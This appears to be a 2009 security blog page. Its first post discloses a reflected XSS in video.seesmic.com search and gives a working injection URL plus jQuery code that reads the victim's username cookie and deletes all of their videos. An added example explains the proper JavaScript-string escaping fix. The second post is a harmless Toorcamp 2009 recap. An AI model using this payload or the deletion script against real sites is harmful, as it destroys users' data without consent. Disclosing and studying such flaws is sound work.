Jul 11 2009

XSS in video.seesmic.com search; Includes bonus feature

Normally when I see injection vectors it’s simply because unsanitized user input is echoed back to the user in some really obvious fashion. Those get old quickly.

The particular injection point I found was fun because Seesmic took the time to urlencode the search terms when echoing them back to the user, but then later on in the page used that same input inside a small chunk of JavaScript. What’s awesome about that is that we don’t have to include script tags; our input just gets run automatically. More fun than Saturday morning cartoons.

Here is the injection vector. It requires that the victim have a valid Seesmic session open, but just think if somebody posted a video linking to a tinyurl of this and this fun little JavaScript turned all the users’ private videos public.

http://video.seesmic.com/search?q='%2C%20videoSearchCount%3A0%2CpeopleSearchCount%3A0%7D%3Balert('xss')%3Btest%20%3D%20%7Ba%3A'
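The injection point above is a search term written into an inline script's object literal, so the defence that actually helps is output encoding for the JavaScript-string context, not the URL-encoding the site applied. The following is an added example, not Seesmic's code; the object-literal shape and the renderVulnerable/renderFixed helpers are assumptions reconstructed from the payload:

```javascript
// Added example (not from the original post). The decoded payload from the URL above:
const PAYLOAD = "', videoSearchCount:0,peopleSearchCount:0};alert('xss');test = {a:'";

// Escape a value for use inside a single-quoted JS string literal embedded in an
// inline <script>. Quotes and backslashes stop the string from being closed early;
// < > & / stop the HTML parser from seeing a closing </script> tag; the line
// terminators (U+2028/2029, CR, LF) keep the literal from being split.
function jsStringEscape(value) {
  return String(value).replace(/[\\'"<>&\/\u2028\u2029\r\n\t\0]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// Vulnerable pattern (assumed shape): the decoded query goes straight into the script.
function renderVulnerable(q) {
  return "test = {a:'" + q + "', videoSearchCount:0,peopleSearchCount:0}";
}

// Fixed pattern: same template, value escaped for the JS-string context.
function renderFixed(q) {
  return "test = {a:'" + jsStringEscape(q) + "', videoSearchCount:0,peopleSearchCount:0}";
}

// Run the rendered script the way a browser would, with alert() stubbed, and
// report whether an injected statement executed and what test.a ended up holding.
function runInlineScript(script) {
  let alerted = false;
  const alert = () => { alerted = true; };
  const result = new Function("alert", "var test; " + script + "; return test;")(alert);
  return { alerted: alerted, value: result.a };
}

console.log(runInlineScript(renderVulnerable(PAYLOAD))); // injected alert runs, a is ''
console.log(runInlineScript(renderFixed(PAYLOAD)));      // no alert, a is the raw payload
```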

So who really cares if there is an XSS in video.seesmic.com? I thought about it for a while and came up with one particular exploit that would impact a few Seesmic users. How about deleting all of a user’s videos if they visit a magical link? Here are the details. (I also thought a variant that would make all private videos public would have been fun, but I just don’t have the time.)

1. A user with a valid session clicks on a nice tiny url. (Just think of how many people would click on this in a description for a video in the public stream!)
2. The username is parsed from the site cookies.
3. The user’s video JSON feed is loaded up.
4. For each video gathered in step 3, delete the video.

So how about some code? I left out at least one of the utility functions, so you have to know at least somewhat what is going on to make it work.

// Delete a single video by id with a same-origin DELETE request
function deletevideo(id) {
  jQuery(document).ready(function() {
    jQuery.ajax({
      type: "DELETE",
      url: "/videos/" + id + ".json",
      data: "preventCache=1234567890"
    });
  });
}

// readCookie() is the utility function left out of the post; it returns the
// value of the named cookie from document.cookie
var username = readCookie("username");

// Load the user's video feed and delete every video listed in it
jQuery.getJSON("/users/" + username + "/videos.json",
  function(data) {
    for (var i in data) {
      deletevideo(data[i].thread_id);
    }
  });

Jul 07 2009

Toorcamp 2009 in review

Toorcamp 2009 is officially over in the history books as the first ever US hacker camp. If you missed it be sure to attend the next one. You are guaranteed to not only learn something, but meet some of the brightest minds in the hacker culture. I sure had a great time. Here are a few of my favorite moments in no particular order.

1. There were many great talks. In particular I enjoyed the following, and recommend you look up the videos when/if they have them online.

  • Ben Kurtz – Short attention span security
  • mudsplatter (I hope people caught the few good points during his drunken hilarious presentation)
  • Michael Ossmann & Dominic Spill – Building an All-Channel Bluetooth Monitor
  • Sai Emrys – Suing telemarketers for fun & profit
  • Willow – Parkour (during Ignite Toorcamp)

2. Mother Nature pwned Toorcamp with a few giant dust devils. The sight of a floor mat flying around like a magic carpet was awesome (although I should probably use the word epic here, as that seems to be the current trend).

3. Touring the missile silo.

4. Workshops. While it will be a while until I can apply the knowledge, I learned more about software controlled radio than I ever had before sitting around with Michael and Dominic. It’s hard to explain it here but suffice it to say that a slinky completely blew my mind.

5. The badge. Shiny distracting object that lights up when either 13.56 MHz or 125 kHz signals are detected. It uses no on-board power, like RFID.

Bonus: The people. The people were absolutely amazing. It’s almost impossible to explain what it’s like to be around a bunch of peers / hackers in that harsh of an environment. People were generous and really pulled together to make ToorCamp a great experience.

I will get my W3AF presentation materials up soon.
